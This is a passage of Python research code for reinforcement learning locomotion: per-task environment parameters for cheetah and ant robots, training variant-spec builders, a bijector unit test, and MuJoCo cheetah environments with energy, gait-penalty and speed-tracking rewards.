'SymlossT-v8': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "trotv2",
'xml_file': 'full_cheetah_heavyv3.xml',
"speed": 5
},
'SymlossGfblr-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallopFBLR",
'xml_file': 'full_cheetah_heavyv3.xml',
},
'SymPenG-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"soft_gait_penalty_weight" : 0.05,
"soft_gait_target" : 0,
"speed":3,
},
'SymPenG-v1': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"soft_gait_penalty_weight" : 0.05,#0.25#0.5
"soft_gait_target" : 0,
"speed":5,
},
'SymPenT-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "trot",
'xml_file': 'full_cheetah_heavyv3.xml',
"soft_gait_penalty_weight": 0.05,
"soft_gait_target": 0,
"speed":3,
},
'SymPenT-v1': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "trot",
'xml_file': 'full_cheetah_heavyv3.xml',
"soft_gait_penalty_weight": 0.05,
"soft_gait_target": 0,
"speed": 5,
},
'SymPenG-v2': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"soft_gait_penalty_weight": 1,
"soft_gait_target": 2,
"speed": 3,
},
'SymPenG-v3': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"soft_gait_penalty_weight": 1,
"soft_gait_target": 2.5,
"speed": 3,
},
'SymPenG-v4': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"soft_gait_penalty_weight": 1,
"soft_gait_target": 3,
"speed": 3,
},
'SymPenG-v5': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"soft_gait_penalty_weight": 1,
"soft_gait_target": 2,
"speed": 5,
},
'SymPenG-v6': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"soft_gait_penalty_weight": 1,
"soft_gait_target": 2.5,
"speed": 5,
},
'SymPenG-v7': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop",
'xml_file': 'full_cheetah_heavyv3.xml',
"soft_gait_penalty_weight": 1,
"soft_gait_target": 3,
"speed": 5,
},
# 'SymPenG-v5': {
# 'forward_reward_weight': 1.0,
# 'ctrl_cost_weight': 0.1,
# 'energy_weights': 0,
# "walkstyle": "gallop2",
# 'xml_file': 'full_cheetah_heavyv3.xml',
# "soft_gait_penalty_weight": 1,
# "soft_gait_target": 0.25,
# "soft_gait_target2": 0.5,
# },
# 'SymPenG-v6': {
# 'forward_reward_weight': 1.0,
# 'ctrl_cost_weight': 0.1,
# 'energy_weights': 0,
# "walkstyle": "gallop2",
# 'xml_file': 'full_cheetah_heavyv3.xml',
# "soft_gait_penalty_weight": 1,
# "soft_gait_target": 0.5,
# "soft_gait_target2": 1,
# },
# 'SymPenG-v7': {
# 'forward_reward_weight': 1.0,
# 'ctrl_cost_weight': 0.1,
# 'energy_weights': 0,
# "walkstyle": "gallop2",
# 'xml_file': 'full_cheetah_heavyv3.xml',
# "soft_gait_penalty_weight": 1,
# "soft_gait_target": 0.25,
# "soft_gait_target2": 0.75,
# },
},
    'FullCheetah': { # 12 DoF
'Energy0-v0': {
'forward_reward_weight':1.0,
'ctrl_cost_weight':0.1,
'energy_weights':0,
},
'SymlossG-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle":"gallop"
},
'SymdupG-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallop"
},
'SymlossT-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "trot"
},
'SymdupT-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "trot"
},
'SymlossGfblr-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallopFBLR"
},
'SymdupGfblr-v0': {
'forward_reward_weight': 1.0,
'ctrl_cost_weight': 0.1,
'energy_weights': 0,
"walkstyle": "gallopFBLR"
},
},
'AntRun': { # 6 DoF
'Energy0-v0': {
'terminate_when_unhealthy': False, ##
'energy_weights': 0,
},
},
'AntSquaT': { # 6 DoF
'Energy0-v0': {
'ctrl_cost_weight' : 0.1, ##0.1
'horizontal_weight' : 1, ##
'contact_cost_weight' : 0.005, ##5e-4
'distance_weigth' : 5,
'terminate_when_unhealthy':False,##
'energy_weights': 0,
},
},
'AntSquaTRedundant': { # 6 DoF
'Energy0-v0': {
'ctrl_cost_weight' : 0.1, ##0.1
'horizontal_weight' : 10, ##
'contact_cost_weight' : 0.1, ##5e-4
'distance_weigth' : 10,
'terminate_when_unhealthy':False,##
'energy_weights': 0,
},
},
}
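# Minimal lookup sketch: the per-task kwargs above are fetched as
# ENV_PARAMS[domain][task] (see get_variant_spec_base below) and forwarded to the
# environment constructor, e.g.
#   ENV_PARAMS['HalfCheetah']['Energy0-v0']
#   # -> {'forward_reward_weight': 1.0, 'ctrl_cost_weight': 0.1, 'energy_weights': 0}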
NUM_CHECKPOINTS = 10
def get_variant_spec_base(universe, domain, task, policy, algorithm, epoch_length,
                          num_epoch, actor_size=256, critic_size=256,
                          n_layer=2):
if num_epoch is not None:
ALGORITHM_PARAMS_PER_DOMAIN[domain]['kwargs']['n_epochs']=num_epoch
algorithm_params = deep_update(
ALGORITHM_PARAMS_BASE,
ALGORITHM_PARAMS_PER_DOMAIN.get(domain, {})
)
ALGORITHM_PARAMS_ADDITIONAL[algorithm]['kwargs']['epoch_length']=epoch_length
nl=[]
for i in range(n_layer):
nl.append(actor_size)
POLICY_PARAMS_BASE[policy]['kwargs']['hidden_layer_sizes']=tuple(nl)
#POLICY_PARAMS_BASE[policy]['kwargs']['hidden_layer_sizes']=(actor_size,actor_size)
algorithm_params = deep_update(
algorithm_params,
ALGORITHM_PARAMS_ADDITIONAL.get(algorithm, {})
)
print(algorithm_params)
env_param = ENV_PARAMS.get(domain, {}).get(task, {})
variant_spec = {
'domain': domain,
'task': task,
'universe': universe,
        'env_params': env_param,
'policy_params': deep_update(
POLICY_PARAMS_BASE[policy],
POLICY_PARAMS_FOR_DOMAIN[policy].get(domain, {})
),
'Q_params': {
'type': 'double_feedforward_Q_function',
'kwargs': {
'hidden_layer_sizes': (critic_size,critic_size),#256
}
},
'algorithm_params': algorithm_params,
'replay_pool_params': {
'type': 'SimpleReplayPool',
'kwargs': {
'max_size': tune.sample_from(lambda spec: (
{
'SimpleReplayPool': int(1e6),
'TrajectoryReplayPool': int(1e4),
}.get(
spec.get('config', spec)
['replay_pool_params']
['type'],
int(1e6))
)),
}
},
'sampler_params': {
'type': 'SimpleSampler',
'kwargs': {
'max_path_length': MAX_PATH_LENGTH_PER_DOMAIN.get(
domain, epoch_length),#DEFAULT_MAX_PATH_LENGTH
'min_pool_size': MAX_PATH_LENGTH_PER_DOMAIN.get(
domain, DEFAULT_MAX_PATH_LENGTH),
'batch_size': 256,
}
},
'run_params': {
'seed': tune.sample_from(
lambda spec: np.random.randint(0, 10000)),
'checkpoint_at_end': True,
'checkpoint_frequency': NUM_EPOCHS_PER_DOMAIN.get(
domain, DEFAULT_NUM_EPOCHS) // NUM_CHECKPOINTS,
'checkpoint_replay_pool': False,
},
}
return variant_spec
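# Example call (sketch; assumes 'gym', 'gaussian' and 'SAC' are valid keys of the
# universe/policy/algorithm dicts defined earlier in this file):
#   spec = get_variant_spec_base('gym', 'HalfCheetah', 'Energy0-v0', 'gaussian', 'SAC',
#                                epoch_length=1000, num_epoch=300)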
def get_variant_spec_image(universe,
domain,
task,
policy,
algorithm,
*args,
**kwargs):
variant_spec = get_variant_spec_base(
universe, domain, task, policy, algorithm, *args, **kwargs)
if 'image' in task.lower() or 'image' in domain.lower():
preprocessor_params = {
'type': 'convnet_preprocessor',
'kwargs': {
'image_shape': variant_spec['env_params']['image_shape'],
'output_size': M,
'conv_filters': (4, 4),
'conv_kernel_sizes': ((3, 3), (3, 3)),
'pool_type': 'MaxPool2D',
'pool_sizes': ((2, 2), (2, 2)),
'pool_strides': (2, 2),
'dense_hidden_layer_sizes': (),
},
}
variant_spec['policy_params']['kwargs']['preprocessor_params'] = (
preprocessor_params.copy())
variant_spec['Q_params']['kwargs']['preprocessor_params'] = (
preprocessor_params.copy())
return variant_spec
def get_variant_spec(args):
universe, domain, task = args.universe, args.domain, args.task
if ('image' in task.lower()
or 'blind' in task.lower()
or 'image' in domain.lower()):
variant_spec = get_variant_spec_image(
universe, domain, task, args.policy, args.algorithm)
else:
variant_spec = get_variant_spec_base(
            universe, domain, task, args.policy, args.algorithm, args.epoch_length,
            args.total_epoch, args.actor_size, args.critic_size, n_layer=args.n_layer)
if args.checkpoint_replay_pool is not None:
variant_spec['run_params']['checkpoint_replay_pool'] = (
args.checkpoint_replay_pool)
return variant_spec
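# Note: `args` is expected to provide universe, domain, task, policy, algorithm,
# epoch_length, total_epoch, actor_size, critic_size, n_layer and
# checkpoint_replay_pool (see the attribute accesses above).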
```
#### File: distributions/bijectors/conditional_scale_test.py
```python
from absl.testing import parameterized
import numpy as np
import tensorflow.compat.v2 as tf
from softlearning.distributions import bijectors
from softlearning.internal import test_util
@test_util.test_all_tf_execution_regimes
class ScaleBijectorTest(test_util.TestCase, parameterized.TestCase):
"""Tests correctness of the Y = scale @ x transformation."""
def testName(self):
bijector = bijectors.ConditionalScale()
self.assertStartsWith(bijector.name, 'conditional_scale')
@parameterized.named_parameters(
dict(testcase_name='static_float32', is_static=True, dtype=np.float32),
dict(testcase_name='static_float64', is_static=True, dtype=np.float64),
dict(testcase_name='dynamic_float32', is_static=False, dtype=np.float32),
dict(testcase_name='dynamic_float64', is_static=False, dtype=np.float64),
)
def testNoBatchScale(self, is_static, dtype):
scale = dtype(2.0)
bijector = bijectors.ConditionalScale(dtype=dtype)
x = self.maybe_static(np.array([1., 2, 3], dtype), is_static)
self.assertAllClose([2., 4, 6], bijector.forward(x, scale=scale))
self.assertAllClose([.5, 1, 1.5], bijector.inverse(x, scale=scale))
self.assertAllClose(
-np.log(2.),
bijector.inverse_log_det_jacobian(x, scale=scale, event_ndims=0))
@parameterized.named_parameters(
dict(testcase_name='static_float32', is_static=True, dtype=np.float32),
dict(testcase_name='static_float64', is_static=True, dtype=np.float64),
dict(testcase_name='dynamic_float32', is_static=False, dtype=np.float32),
dict(testcase_name='dynamic_float64', is_static=False, dtype=np.float64),
)
def testBatchScale(self, is_static, dtype):
# Batched scale
scale = tf.constant([2., 3.], dtype=dtype)
bijector = bijectors.ConditionalScale(dtype=dtype)
x = self.maybe_static(np.array([1.], dtype=dtype), is_static)
self.assertAllClose([2., 3.], bijector.forward(x, scale=scale))
self.assertAllClose([0.5, 1./3.], bijector.inverse(x, scale=scale))
self.assertAllClose(
[-np.log(2.), -np.log(3.)],
bijector.inverse_log_det_jacobian(x, scale=scale, event_ndims=0))
if __name__ == '__main__':
tf.test.main()
```
#### File: gym/mujoco/half_cheetah.py
```python
import numpy as np
from gym import utils
from gym.envs.mujoco import mujoco_env
import os
from . import path
from .mirror_utils import convert_to_mirror_list,MIRROR_DICTS
from collections import deque
DEFAULT_CAMERA_CONFIG = {
'distance': 4.0,
}
"""
0 rootz slider C
1 rooty hinge C
2 bthigh hinge L
3 bshin hinge L
4 bfoot hinge L
5 fthigh hinge R
6 fshin hinge R
7 ffoot hinge R
8 rootx slider C
9 rootz slider C
10 rooty hinge C
11 bthigh hinge L
12 bshin hinge L
13 bfoot hinge L
14 fthigh hinge R
15 fshin hinge R
16 ffoot hinge R
"""
class HalfCheetahEnv(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bthigh','bshin','bfoot','fthigh','fshin','ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
self.mirror_inds=MIRROR_DICTS["HalfCheetah"]
self.mirror_lists=convert_to_mirror_list(self.mirror_inds)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
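        # Energy proxy: accumulate |torque command| * |joint angle change| over the
        # six actuated joints for this control step.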
for i in range(6):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
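# Sketch of a direct construction with the kwargs used by the variant configs
# (normally the env is created through its registered gym id; shown here only to
# make the parameter mapping explicit):
#   env = HalfCheetahEnv(forward_reward_weight=1.0, ctrl_cost_weight=0.1,
#                        energy_weights=0.)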
class HalfCheetahHeavyEnv(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_heavy.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bthigh','bshin','bfoot','fthigh','fshin','ffoot']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(6):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class FullCheetahEnv(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='full_cheetah.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
contact_cost_weight=0, ##5e-4
contact_force_range=(-1.0, 1.0),
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
walkstyle="",#"gallop" "trot"
energy_weights=0.,
phase_delay=0,
soft_gait_penalty_weight=0,
soft_gait_target=0,
soft_gait_target2=0,
speed=0):
utils.EzPickle.__init__(**locals())
self.speed=speed
self._forward_reward_weight = forward_reward_weight
self.soft_gait_penalty_weight=soft_gait_penalty_weight
self.soft_gait_target=soft_gait_target
self.soft_gait_target2=soft_gait_target2
self.joint_list=['bthighL','bshinL','bfootL','fthighL','fshinL','ffootL',
'bthighR', 'bshinR', 'bfootR', 'fthighR', 'fshinR', 'ffootR']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._contact_cost_weight = contact_cost_weight
self._contact_force_range = contact_force_range
self.phase_delay=phase_delay
if self.phase_delay!=0:
self.delay_deque=deque(maxlen=self.phase_delay)
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
self.walkstyle=walkstyle
mykey="FullCheetah_"+walkstyle
self.agent=mykey
self.mirror_lr_inds=MIRROR_DICTS["FullCheetah_lr"]
self.mirror_lr_lists=convert_to_mirror_list(self.mirror_lr_inds)
self.mirror_fb_inds=MIRROR_DICTS["FullCheetah_fb"]
self.mirror_fb_lists=convert_to_mirror_list(self.mirror_fb_inds)
self.contact={
"BL":[],
"FL": [],
"BR": [],
"FR": [],
}
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
def contact_forces(self):
raw_contact_forces = self.sim.data.cfrc_ext
min_value, max_value = self._contact_force_range
contact_forces = np.clip(raw_contact_forces, min_value, max_value)
return contact_forces
def contact_cost(self):
contact_cost = np.sum(np.square(self.contact_forces()))
return self._contact_cost_weight *contact_cost
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def gait_cost(self,action):
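        # Soft gait penalty: measure how far the right-leg actions (indices 6:12)
        # deviate from the prescribed relation to the left-leg actions (indices 0:6)
        # for the selected walkstyle; scaled by soft_gait_penalty_weight.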
gait_cost=0
if self.walkstyle=="gallop":
gait_cost=np.abs(np.sum(np.abs(action[6:12] - action[0:6]))-self.soft_gait_target)
elif self.walkstyle == "gallop2":
gait_cost=np.abs(np.sum(np.abs(action[6:9] - action[0:3]))-self.soft_gait_target)+\
np.abs(np.sum(np.abs(action[9:12] - action[3:6]))-self.soft_gait_target2)
elif self.walkstyle == "trot":
gait_cost=np.abs(np.sum(np.abs(action[6:9] +action[0:3]))
+np.sum(np.abs(action[9:12] +action[3:6]))-self.soft_gait_target)
return self.soft_gait_penalty_weight *gait_cost
def step(self, action):
if self.soft_gait_penalty_weight==0:
if self._contact_cost_weight==0 and self.walkstyle=="gallop":
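                # Hard gallop constraint: right legs copy the left-leg actions,
                # optionally delayed by phase_delay control steps via delay_deque.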
if self.phase_delay!=0 and len(self.delay_deque)==self.phase_delay:
action[6:12] = self.delay_deque[0]
else:
action[6:12] = action[0:6] # Right equals left
if self.phase_delay != 0:
self.delay_deque.append((action[0:6]))
elif self.walkstyle=="trot":
action[6:9] = -1*action[0:3]#bR equals negative bL
action[9:12] = -1 * action[3:6] # fR equals negative fL
elif self.walkstyle == "trotv2":
action[9:12] = action[0:3] # fR equals bL
action[6:9] = action[3:6] # bR equals fL
# self.contact["BL"].append(0)
# self.contact["FL"].append(0)
# self.contact["BR"].append(0)
# self.contact["FR"].append(0)
#
# for contactnum in range(self.data.ncon):
# c=self.data.contact[contactnum]
# if c.dist!=0:
# cur_g = c.geom2
# if cur_g == 8:
# self.contact["BL"][-1]=1
# #print("BL")
# elif cur_g == 11:
# self.contact["FL"][-1] = 1
# #print("FL")
# elif cur_g == 14:
# self.contact["BR"][-1] = 1
# #print("BR")
# elif cur_g == 17:
# #print("FR")
# self.contact["FR"][-1] = 1
#
# if len(self.contact["BL"])>500:
# print("SAVE gait!")
# #name="gallop_200_s5r5"
# name = "RealFCT_v1r1"
# np.save('../gait_info/' + name, self.contact)
# quit()
#print(self.data.contact[0].geom2)
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
if self.speed != 0:
delta_speed=-abs(x_velocity-self.speed) #negative as we want to minimize this delta
x_velocity=delta_speed
ctrl_cost = self.control_cost(action)
contact_cost = self.contact_cost()
gait_cost = self.gait_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost - contact_cost- gait_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'reward_contact': -contact_cost,
'reward_gait': -gait_cost,
'ori_reward':forward_reward-ctrl_cost -contact_cost-gait_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_5dof(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_5dof.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
reset_noise_scale=0.1,
exclude_current_positions_from_observation=True,
energy_weights=0.):
utils.EzPickle.__init__(**locals())
self._forward_reward_weight = forward_reward_weight
self.joint_list=['bthigh','bshin','bfoot','fthigh','fshin']
self._ctrl_cost_weight = ctrl_cost_weight
self.energy_weights=energy_weights
self._reset_noise_scale = reset_noise_scale
self._exclude_current_positions_from_observation = (
exclude_current_positions_from_observation)
global path
mujoco_env.MujocoEnv.__init__(self, os.path.join(path, xml_file), 5)
#mujoco_env.MujocoEnv.__init__(self, xml_file, 5)
def control_cost(self, action):
control_cost = self._ctrl_cost_weight * np.sum(np.square(action))
return control_cost
def step(self, action):
states_angle = []
for j in self.joint_list:
states_angle.append(self.sim.data.get_joint_qpos(j))
#states=self._get_obs()
x_position_before = self.sim.data.qpos[0]
self.do_simulation(action, self.frame_skip)
x_position_after = self.sim.data.qpos[0]
x_velocity = ((x_position_after - x_position_before)
/ self.dt)
ctrl_cost = self.control_cost(action)
forward_reward = self._forward_reward_weight * x_velocity
observation = self._get_obs()
#next_states=observation
next_states_angle = []
for j in self.joint_list:
next_states_angle.append(self.sim.data.get_joint_qpos(j))
reward = forward_reward - ctrl_cost
done = False
energy = 0
for i in range(len(self.joint_list)):
delta_theta = np.abs(next_states_angle[i] - states_angle[i])
energy = energy + np.abs(action[i]) * delta_theta
'''delta_theta_bt = np.abs(next_states[2] - states[2])
delta_theta_bs = np.abs(next_states[3] - states[3])
delta_theta_bf = np.abs(next_states[4] - states[4])
delta_theta_ft = np.abs(next_states[5] - states[5])
delta_theta_fs = np.abs(next_states[6] - states[6])
delta_theta_ff = np.abs(next_states[7] - states[7])
energy_bt = np.abs(action[0]) * delta_theta_bt
energy_bs = np.abs(action[1]) * delta_theta_bs
energy_bf = np.abs(action[2]) * delta_theta_bf
energy_ft = np.abs(action[3]) * delta_theta_ft
energy_fs = np.abs(action[4]) * delta_theta_fs
energy_ff = np.abs(action[5]) * delta_theta_ff
energy = energy_bt + energy_bs + energy_bf + energy_ft + energy_fs + energy_ff'''
reward -= self.energy_weights*energy
info = {
'x_position': x_position_after,
'x_velocity': x_velocity,
'energy' : energy,
'reward_run': forward_reward,
'reward_ctrl': -ctrl_cost,
'ori_reward':forward_reward-ctrl_cost
}
return observation, reward, done, info
def _get_obs(self):
position = self.sim.data.qpos.flat.copy()
velocity = self.sim.data.qvel.flat.copy()
if self._exclude_current_positions_from_observation:
position = position[1:]
observation = np.concatenate((position, velocity)).ravel()
return observation
def reset_model(self):
noise_low = -self._reset_noise_scale
noise_high = self._reset_noise_scale
qpos = self.init_qpos + self.np_random.uniform(
low=noise_low, high=noise_high, size=self.model.nq)
qvel = self.init_qvel + self._reset_noise_scale * self.np_random.randn(
self.model.nv)
self.set_state(qpos, qvel)
observation = self._get_obs()
return observation
def viewer_setup(self):
for key, value in DEFAULT_CAMERA_CONFIG.items():
if isinstance(value, np.ndarray):
getattr(self.viewer.cam, key)[:] = value
else:
setattr(self.viewer.cam, key, value)
class HalfCheetahEnv_5dofv2(mujoco_env.MujocoEnv, utils.EzPickle):
def __init__(self,
xml_file='half_cheetah_5dofv2.xml',
forward_reward_weight=1.0,
ctrl_cost_weight=0.1,
